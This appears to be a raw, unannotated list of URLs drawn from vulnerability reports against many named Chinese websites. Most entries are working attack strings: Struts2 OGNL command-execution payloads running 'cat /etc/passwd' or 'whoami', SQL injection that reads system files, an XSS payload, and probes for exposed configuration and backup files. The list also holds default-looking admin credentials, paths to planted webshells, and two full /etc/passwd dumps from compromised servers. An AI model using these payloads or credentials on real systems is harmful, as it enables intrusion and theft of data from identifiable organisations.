http://www.cgirls.cn/cgirl.php?type=%e8%bf%b7%e4%ba%ba%e6%80%a7%e6%84%9f http://www.reocar.com/.svn/entries http://www.reocar.com/blog/.svn/entries http://monitor.aoshitang.com http://www.rufengda.com/newscenter/list?cateid=2&page=2 http://www.cn-arcn.com/webdata http://www.cn-arcn.com/newshow.asp?id=397 http://nba.hupu.com/admin/match_add/match.php http://jjwxc.aoshitang.com/mingjiang/content/169 http://jjwxc.aoshitang.com/mingjiang/content/169%20and%201=1 http://jjwxc.aoshitang.com/mingjiang/content/169%20and%201=2 http://jtzs.games7080.com/news/show.php?news_id=224 http://jtzs.games7080.com/yxzl/infoview.php?news_id=3 http://mhfx.games7080.com/activity/show.php?news_id=255 http://mhfx.games7080.com/media/show.php?news_id=240 http://mhfx.games7080.com/notice/show.php?news_id=129 http://www.cqcn.org/ http://www.cqcn.org/js/ http://www.cqcn.org/keys/ http://www.cqcn.org/Templates/ http://www.cqcn.org/fckeditor/ http://www.xinyangcb.cn/onews.asp?id=578 http://www.xinyangcb.cn/ONEWS.asp?id=59 http://www.xinyangcb.cn/admin http://www.xinyangcb.cn/admin/editor/upload.asp http://www.zzsf.com/WEB-INF/web.xml http://mj.aoshitang.com/WEB-INF/web.xml http://as.aoshitang.com/WEB-INF/web.xml http://hotel.lvee.cn:9090/HBE/Hotel/HotelInfoSearchAction.action?User_ID=&Serial_no=&WebFlag=Y&MODULE=CAN378_hotel_new.htm&Corp_ID=CAN378&conditions.cityCode=GZP&conditions.checkIn=2013.05.04&conditions.checkOut=2013.05.05&conditions.queryType=A&hotelId=SSTHL http://icp.now.cn/admin/login.php http://icp.now.cn/admin/index.php http://gdgz.gdin.cn/searchResourceList.do?resourceName=aa http://www.xinnet.com/views/mail/script/mail.jsp http://www.atc.sgcc.com.cn/temporary/ http://secaqb.anquanbao.org/xss.php?gcode=.%3Cscript%20src=http://localhost/1.js%3E http://mantis.fantong.com http://www.post.gx.cn http://gh.post.gx.cn/index1.php?category=mod_content&id=2131 http://baidu.com http://gh.post.gx.cn/admin/20060522091908/ http://gh.post.gx.cn/test/ http://gh.post.gx.cn/test/class/ http://211.138.242.136/info.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 http://211.138.242.136/php/ http://secaqb.anquanbao.org/sqlin.php?id='.aaa.'%20or%201 xxx.jpg/1.php xxx.jpg/1.2.php http://www.soft.zjut.edu.cn/admin/index.do http://lasercenter.ipc.ac.cn/intro/memberdetail.asp?id=1 http://lasercenter.ipc.ac.cn/news/noticedetail.asp?id=8 http://lasercenter.ipc.ac.cn/news/newsdetail.asp?id=44 http://lefen.lenovo.com//Home/ http://chita.lenovo.com/Home/Lib/ http://chita.lenovomm.com/Admin/Runtime/ http://wenda.so.com/index/ask?to_qid=150374392&to_name=wooyun%22%3E%3Cimg%20src=1%20onerror=alert%28%22wooyun%22%29%3E http://dhwy.dahe.cn/database.rar http://xyjj.dahe.cn/web1.rar http://yn.dahe.cn/l.rar http://zyjjq.dahe.cn/1.txt http://zyjjq.dahe.cn/2.txt http://223.4.48.77/main.ht# user:admin pass:123456 http://www.gscass.cn/download/uploadpic.jsp?pfilepath=imgpath ssrsj.ss.gov.cn/zhuce/index.asp http://g.youc.com/ http://g.youc.com/plus/mytag_js.php?aid=9090 http://www.henan100.com/go/q.php?id=238 http://www.henan100.com/go/q.php?id=-238%27+union+all+select+1,2,CONCAT_WS%28CHAR%2832,58,32%29,user%28%29,database%28%29,version%28%29%29,4,5,6+and+%27x%27=%27x http://www.henan100.com/go/q.php?id=-238%27+union+all+select+1,2,load_file%280x2F6574632F706173737764%29,4,5,6+and+%27x%27=%27x http://info.qibebt.cas.cn/biofuels/showdetailnews/?recordid=6 http://mdata.ivpp.ac.cn:8080/special/admin/login.jsp http://fast.bao.ac.cn/showNews.php?Action=News&ID=67 http://fast.bao.ac.cn/Pic.php?Action=Pic&ID=23 http://www.llas.ac.cn/dtviewfile9.aspx?index=1 http://nzc.iap.ac.cn/news.jsp?lng=c&opr=view&id=483 http://nzc.iap.ac.cn/user.jsp?lng=c&opr=view&userid=18 http://nzc.iap.ac.cn/upfile.jsp?lng=c&filetype=ppt&opr=view&id=48 http://cmsr.iap.ac.cn/?p=36 http://cmsr.iap.ac.cn/?p=46 http://cmsr.iap.ac.cn/?a=view&p=50 http://cmsr.iap.ac.cn/?a=view&p=50 http://images.wandafilm.com/ http://www.theskinfoodus.com/upload_files/temp/diy.asp http://www.theskinfoodus.com/upload_files/temp/lt.aspx http://www.ce.zjut.edu.cn/admin/main.jsp www.post183.net http://www.post183.net/post183/postinfo/news/news.php?id=17039 http://www.post183.net/post183/dangjian/view.php?id=17039 http://www.post183.net/post183/dangjian/moreinfo.php?ss=3%27 http://www.post183.net/post183/dangjian/index.php http://www.post183.net/post183/common/login.htm http://www.zz185.com/news.asp?id=598 http://210.32.200.192/hcOA/index.do http://qhec.gov.cn/sitefiles/ http://nst.pku.edu.cn/article.php?sid=6576 http://dev.t.qq.com http://struts.apache.org/release/2.3.x/docs/s2-016.html http://struts.apache.org/release/2.3.x/docs/s2-017.html http://struts.apache.org/release/2.3.x/docs/s2-016.html http://struts.apache.org/release/2.3.x/docs/s2-017.html http://www.gomesell.com/interfaces/search/showSearchResult.action?redirect:http://www.wooyun.org/ http://www.hhhtcz.gov.cn/Data/Backup/20130711.bak http://www.hhhtcz.gov.cn/Data/#@#@#@#@db.mdb http://58.83.206.34/login/start.action?redirectAction:http://www.google.com/%EF%BC%8523 http://app.music.360buy.com/client_download.action?redirectAction:http://www.google.com/%EF%BC%8523 http://58.83.206.108/login/index.action?redirectAction:http://www.google.com/%EF%BC%8523 http://58.83.206.105/index.action?redirectAction:http://www.google.com/%EF%BC%8523 http://hr.vivo.com.cn/index.php?c=social_job&m=detailOne&id=67 http://hr.vivo.com.cn/admin.php http://500wan.3g.qq.com/3g/buy/dlc/dlckp_index.action?redirect:http://www.wooyun.org http://telhosting.xinnet.com/g2/login.action?redirect:http://www.wooyun.com/ http://sms.m.qunar.com/login.action http://sms.m.qunar.com/login.action?redirect:http://wooyun.org http://sms.m.qunar.com/login.action?action https://irbcast.nokia.com/nmds/stationOwnership!getSelectedStation.action http://union.zt.sohu.com/index.action http://data.yule.sohu.com/movie/showtime/index.action?redirect:http://www.wooyun.org http://mail.cgdc.com.cn:8080/gw/admin/index.php eyouuser:eyou_admin http://ddp.buaa.edu.cn/read.asp?id=98 http://bbs.cntv.cn/iframe/index.php?tid=26494153'%20and%20'1'='1&method=showlist&module=bbsindex&jsonpcallback=jsonp_wooyun http://www.so.com/s?q=intitle%3A%E5%90%8E%E5%8F%B0%E7%AE%A1%E7%90%86+%E7%94%A8%E6%88%B7%E5%90%8D POC:http://hsxt.mofcom.gov.cn/MOFCOM/manage.action?redirectAction:http://www.google.com/%23 http://search.ifeng.com/sofeng/search.action http://www.miitbeian.gov.cn/state/outPortal/loginPortal.action http://www.miitbeian.gov.cn/state/outPortal/loginPortal.action?redirect:http://www.baidu.com/ http://wm123.baidu.com/login.action?redirect:http://www.yahoo.com/ http://m.jd.com/ware/search.action?redirect:${%23s%3dnew%20java.util.ArrayList%28%29,%23x%3dnew%20java.lang.String%28%22netstat%22%29,%23xx%3dnew%20java.lang.String%28%22-an%22%29,%23s.add%28%23x%29,%23s.add%28%23xx%29,%23a%3dnew%20java.lang.ProcessBuilder%28%23s%29.start%28%29.getInputStream%28%29,%23b%3dnew%20java.io.InputStreamReader%28%23a%29,%23c%3dnew%20java.io.BufferedReader%28%23b%29,%23d%3dnew%20char[51020],%23c.read%28%23d%29,%23dddddd%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29.getWriter%28%29,%23dddddd.println%28%23d%29,%23dddddd.close%28%29 http://home.jd.com/myjd_index.action?redirect:http://www.yahoo.com/ http://ka.game.163.com/cardsystem/card!search.action http://im.gm.163.com/login.action http://product.mobile.163.com/data!newproduct.action http://im.gm.163.com/login.action?queuecode=pk http://im.gm.163.com/login.action?redirect:http://www.yahoo.com/ http://editor.tudou.com/examinate/system/login.do http://love.baihe.com/Reg.action,官方给的poc是,http://host/struts2-blank/example/X.action?action:%25{3*4 http://love.baihe.com/Reg.action?redirectAction:http://www.google.com/%23 http://www.jsspw.gov.cn/website/jsapprove/jsApproveSiteAction.action http://data.euro2012.qq.com/eurocupTencent/eurocup/euroLive.action encap:Ethernet MTU:1480 txqueuelen:1000 login.tudou.com/xiaonei/sina/auth.action存在struts2命令执行漏洞 http://plm.7daysinn.cn/account/login.action http://vip.sohu.com/registerinit.action http://union.zt.sohu.com/reset_pwd.action http://event8.wanmei.com/wulin2/wlrangergrace/wlRangerPage.action event20.wanmei.com/mhzx/newlevelprize/newLevel.action event9.wanmei.com/wulin2/wlinformation/insertInform!list.action event21.wanmei.com/shenmo/findbug1/findbug!getIndexLists.action site:duowan.com filetype:action。 http://link.duowan.com/user!login.action http://tougao.duowan.com/user!login.action mail.wo.com.cn/mail/login.action mail.wo.com.cn/mail/login.action?redirect:http://www.baidu.com/ http://union.sogou.com/login.action http://vip.sohu.com/registerinit.action http://vip.sohu.com/registerinit.action?redirect:http://www.yahoo.com/ http://fenxiao.jiwu.com/agent!login.action http://fenxiao.jiwu.com/agent!login.action?redirect:http://www.g.cn/ http://www.dianping.com/login http://career.cmbc.com.cn:8080/portal/notice/viewPortalNotice.action http://wksc.xywy.com/store-1607-0-1.html?keyword=88952634&max_price=100&min_price=1 url:union.xiu.com/sina/redirect.action http://www.dagexing.com/index/portal.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 http://360.baihe.com/iqgx/indexAction.action http://struts.apache.org/release/2.3.x/docs/s2-016.html http://giftcard.jd.com/exchange/index.action http://taocode.taobao.com/baoming/shop/shop.action http://b2b.sogou.com/search/pr.earch/products.do http://fw.jd.com/ser/detail.action?serviceCode=FW_GOODS-4803 http://gw.m.360buy.com/client.action http://jpns.m.360buy.com/client.action my.17173.com/app/seckill/f/activity/list.action http://act.sj.qq.com/bless/blog.do?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 http://t.people.com.cn/hebeizw.action?redirect:%24{%23a_str%3Dnew+java.lang.String%28%27ya%27%29%2C%23b_str%3Dnew+java.lang.String%28%27seng%27%29%2C%23a_resp%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23a_resp.getWriter%28%29.println%28%23a_str.concat%28%23b_str%29%29%2C%23a_resp.getWriter%28%29.flush%28%29%2C%23a_resp.getWriter%28%29.close%28%29 http://www.17k.com/book/getAuthInfo.action?redirect:${%23a%3d https://buy.cnooc.com.cn/smp/portal/login.action?redirect:${%23s%3dnew%20java.util.ArrayList%28%29,%23x%3dnew%20java.lang.String%28%22cat%22%29,%23xx%3dnew%20java.lang.String%28%22/etc/passwd%22%29,%23s.add%28%23x%29,%23s.add%28%23xx%29,%23a%3dnew%20java.lang.ProcessBuilder%28%23s%29.start%28%29.getInputStream%28%29,%23b%3dnew%20java.io.InputStreamReader%28%23a%29,%23c%3dnew%20java.io.BufferedReader%28%23b%29,%23d%3dnew%20char[51020],%23c.read%28%23d%29,%23dddddd%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29.getWriter%28%29,%23dddddd.println%28%23d%29,%23dddddd.close%28%29 http://analytics.ws.netease.com/login.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 http://xm.zjkjt.gov.cn/redirect.action http://www.jste.net.cn/uids/login!login.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 http://ees.chinasciencejournal.com/user/login.action?pageCode=Sci_Info http://xjgl.cdcedu.cn/desktop/login/login.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 http://slggkp.zjwater.gov.cn/zcps/login.action taocode.taobao.com/baoming/shop/shop.action http://www.bjcc.gov.cn/webpoll/vote.action http://pay.360buy.com/payment/page_bill.action http://gw.e.360buy.com使用Struts2框架,存在最新的s2-016命令执行漏洞。 id.kingdee.com/oauth/authorize.action存在最新的 http://www.sjgj.cn/cpgs.action http://113.108.189.84:8080/page/desktop.html http://113.108.189.84:8080/webgis/index.jsp?userID= http://person.sac.net.cn/login.action?redirect:${%23s%3dnew%20java.util.ArrayList%28%29,%23x%3dnew%20java.lang.String%28%22cat%22%29,%23xx%3dnew%20java.lang.String%28%22/etc/passwd%22%29,%23s.add%28%23x%29,%23s.add%28%23xx%29,%23a%3dnew%20java.lang.ProcessBuilder%28%23s%29.start%28%29.getInputStream%28%29,%23b%3dnew%20java.io.InputStreamReader%28%23a%29,%23c%3dnew%20java.io.BufferedReader%28%23b%29,%23d%3dnew%20char[51020],%23c.read%28%23d%29,%23dddddd%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29.getWriter%28%29,%23dddddd.println%28%23d%29,%23dddddd.close%28%29 jifen.changyou.com/home/purchase.action http://www.tobaccobid.com/sofeng/search.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28%22whoami%22%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 http://qqh.wxcs.cn/news/getNewsList.action?redirect:${%23a%3d%28new root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/bin/bash daemon:x:2:2:Daemon:/sbin:/bin/bash lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bash mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false games:x:12:100:Games account:/var/games:/bin/bash wwwrun:x:30:8:WWW apache:/var/lib/wwwrun:/bin/false ftp:x:40:49:FTP account:/srv/ftp:/bin/bash nobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bash D-Bus:/var/run/dbus:/bin/false haldaemon:/var/run/hald:/bin/false daemon:/var/lib/sshd:/bin/false man:x:13:62:Manual viewer:/var/cache/man:/bin/bash news:x:9:13:News system:/etc/news:/bin/bash uucp:x:10:14:Unix-to-Unix system:/etc/uucp:/bin/bash uuidd:x:102:103:User uuidd:/var/run/uuidd:/bin/false quagga:x:103:106:Quagga daemon:/var/run/quagga:/usr/bin/false postfix:x:51:51:Postfix Daemon:/var/spool/postfix:/bin/false ldap:x:76:70:User OpenLDAP:/var/lib/ldap:/bin/bash mysql:x:60:109:MySQL admin:/var/lib/mysql:/bin/false dnsmasq:x:105:65534:dnsmasq:/var/lib/empty:/bin/false cyrus:x:96:12:User cyrus-imapd:/usr/lib/cyrus:/bin/bash vscan:x:65:110:Vscan account:/var/spool/amavis:/bin/false named:x:44:44:Name daemon:/var/lib/named:/bin/false at:x:25:25:Batch daemon:/var/spool/atjobs:/bin/bash squid:x:31:65534:WWW-proxy squid:/var/cache/squid:/bin/false ntp:x:74:111:NTP daemon:/var/lib/ntp:/bin/false mailman:x:72:67:GNU manager:/var/lib/mailman:/bin/bash fetchmail:x:106:2:mail daemon:/var/lib/fetchmail:/bin/false polkituser:x:107:112:PolicyKit:/var/run/PolicyKit:/bin/false pulse:x:108:113:PulseAudio daemon:/var/lib/pulseaudio:/bin/false dhcpd:x:109:65534:DHCP daemon:/var/lib/dhcp:/bin/false suse-ncc:x:110:115:Novell User:/var/lib/YaST2/suse-ncc-fakehome:/bin/bash gdm:x:111:116:Gnome daemon:/var/lib/gdm:/bin/false ftpsecure:x:112:65534:Secure User:/var/lib/empty:/bin/false strm:x:1221:1201::/home/huawei/mdn2000:/bin/bash strmftp:x:1222:1201::/home/ftpdir:/bin/bash wxcsqqh:x:1223:100::/home/wxcsqqh:/bin/bash oracle:x:300:107::/home/oracle:/bin/bash inst01:x:1224:100::/home/inst01:/usr/bin/ksh inst02:x:1225:100::/home/inst02:/usr/bin/ksh http://ka.game.163.com/thirdparty!login.action http://www.17wo.cn/Index.action http://61.178.73.23/sfc/newsInfo!findById.action?id=1239 http://www.12308.com/web/index.action?redirect:${%23s%3dnew%20java.util.ArrayList%28%29,%23x%3dnew%20java.lang.String%28%22cat%22%29,%23xx%3dnew%20java.lang.String%28%22/etc/passwd%22%29,%23s.add%28%23x%29,%23s.add%28%23xx%29,%23a%3dnew%20java.lang.ProcessBuilder%28%23s%29.start%28%29.getInputStream%28%29,%23b%3dnew%20java.io.InputStreamReader%28%23a%29,%23c%3dnew%20java.io.BufferedReader%28%23b%29,%23d%3dnew%20char[51020],%23c.read%28%23d%29,%23dddddd%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29.getWriter%28%29,%23dddddd.println%28%23d%29,%23dddddd.close%28%29 http://eshop.sx.ct10000.com/product/index.action http://beian.zzidc.com/main/beian/showBeianInfo.action http://beian.zzidc.com/main/beian/showBeianInfo.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin saslauth:x:499:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash mysql-proxy:x:498:499:MySQL-Proxy user:/:/sbin/nologin www-users:x:500:500::/dev/null:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin nginx:x:497:497::/home/nginx:/bin/bash http://score.baihe.com http://profile.baihe.com http://invite.baihe.com http://360.baihe.com http://psymatch.baihe.com http://search.baihe.com http://m.zhenai.com/about/service.do?redirect:${%23s%3dnew%20java.util.ArrayList%28%29,%23x%3dnew%20java.lang.String%28%22cat%22%29,%23xx%3dnew%20java.lang.String%28%22/etc/passwd%22%29,%23s.add%28%23x%29,%23s.add%28%23xx%29,%23a%3dnew%20java.lang.ProcessBuilder%28%23s%29.start%28%29.getInputStream%28%29,%23b%3dnew%20java.io.InputStreamReader%28%23a%29,%23c%3dnew%20java.io.BufferedReader%28%23b%29,%23d%3dnew%20char[51020],%23c.read%28%23d%29,%23dddddd%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29.getWriter%28%29,%23dddddd.println%28%23d%29,%23dddddd.close%28%29 http://www.gamepaopao.com/mayi.website/web!index.action http://www.js-study.cn/index.action http://315.stock.hexun.com/querystatisticsobject.action http://xxt.m-school.cn http://www.ems.com.cn/ec-web/login.action http://chat7.jd.com/index.action http://mobile.51bi.com/threadpay.do http://bj.chinaef.com/system/gotoLogin.action http://click.union.jd.com/statistic/redirectPage.action http://sz.chinaef.com/system/gotoLogin.action http://dev.wo.com.cn/appc/appcinfo_forwardAppcInformationIndexForDetail.action http://wap.17wo.cn http://nx.si.gov.cn:809/jmx-console/ http://diy.jd.com下的 http://www.ubsclub.com/DFN/member/Login.action http://job.10086.cn http://www.gzrch.com/login/Cms.do http://zj.10086.cn/ http://vpn.xztelecom.cn/support/card/cardBalance.action http://101568.com/front/index.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 http://chat1.jd.com/api/checkByJd2.action http://user1.baihe.com/MyBaihe/lookAtMe.action,存在命令执行漏洞 http://passport.ourgame.com/sinalogin.do?type=sina&nexturl= http://fund.yeepay.com/openAccount/register!toRegister.action http://union.sogou.com/ http://www.led-konka.com/pro_cat/55.shtml http://www.schj.gov.cn/manageEnpro/enpromeet_getMeetinfo.action http://hx.118114.cn/piao/ych/web/index.action http://www.renrendai.com/lend/detailPage.action?loanId=81238 http://117.34.78.222/login/login.do http://jdwt.dahe.cn/focus/admin/login.do http://admin.yeyou365.com/webTemplate/index.action http://www.zj.bank-of-china.com/cj/promote/index.action http://card.eastday.com/index.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://www.lszwdt.gov.cn/index!index.action http://www.wzggzy.net/index!index.action http://www.naggzy.gov.cn/index!index.action http://ztb.pinghu.gov.cn/index!index.action http://www.ycggzy.gov.cn/index!index.action http://ggzy.yishui.gov.cn/index!index.action http://www.whggzy.com/index!index.action inurl:index!index.action http://article.zhaopin.com/payquery/index.do https://www.shfft.com/ http://demo.cscb.cn/perbank_demo/cert/userCertDownload!keySelect.action http://demo.cscb.cn/perbank_demo/manage/userRegister.action http://zj.yesky.com http://zs.ofpay.com/system/go2FrameHandle.action http://www.kdlins.com.cn/ http://oopka.com/forum.php?mod=viewthread&tid=1714 http://ec.yto.net.cn/login_goLogin.action http://ec.yto.net.cn/login_goLogin.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://rdc.haier.net/security/login.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 http://www.ha.chinamobile.com/tiyan/comment/index.action http://passport.m.jd.com/user/login.action http://yjt.10086.cn/index.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 http://www.taoguba.com.cn/index.action?redirect:${%23s%3dnew%20java.util.ArrayList%28%29,%23x%3dnew%20java.lang.String%28%22cat%22%29,%23xx%3dnew%20java.lang.String%28%22/etc/passwd%22%29,%23s.add%28%23x%29,%23s.add%28%23xx%29,%23a%3dnew%20java.lang.ProcessBuilder%28%23s%29.start%28%29.getInputStream%28%29,%23b%3dnew%20java.io.InputStreamReader%28%23a%29,%23c%3dnew%20java.io.BufferedReader%28%23b%29,%23d%3dnew%20char[51020],%23c.read%28%23d%29,%23dddddd%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29.getWriter%28%29,%23dddddd.println%28%23d%29,%23dddddd.close%28%29 http://m.fj.189.cn/storeFront/index/loginAction!login.action http://manager.17k.com/login.action http://www.360youtu.com/uwp/web/login.jsp https://www.firstback.com.tw/ http://ditu.10086.cn/getPhoneSelectList.action?redirect:${%23s%3dnew%20java.util.ArrayList%28%29,%23x%3dnew%20java.lang.String%28%22cat%22%29,%23xx%3dnew%20java.lang.String%28%22/etc/passwd%22%29,%23s.add%28%23x%29,%23s.add%28%23xx%29,%23a%3dnew%20java.lang.ProcessBuilder%28%23s%29.start%28%29.getInputStream%28%29,%23b%3dnew%20java.io.InputStreamReader%28%23a%29,%23c%3dnew%20java.io.BufferedReader%28%23b%29,%23d%3dnew%20char[51020],%23c.read%28%23d%29,%23dddddd%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29.getWriter%28%29,%23dddddd.println%28%23d%29,%23dddddd.close%28%29 www.cwts.com.cn http://library.xmu.edu.cn/portal/notice.asp?id=4591 http://pop.coo8.com/goods/descInfo_connect_goodsInfo.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://datacenter.mep.gov.cn/ 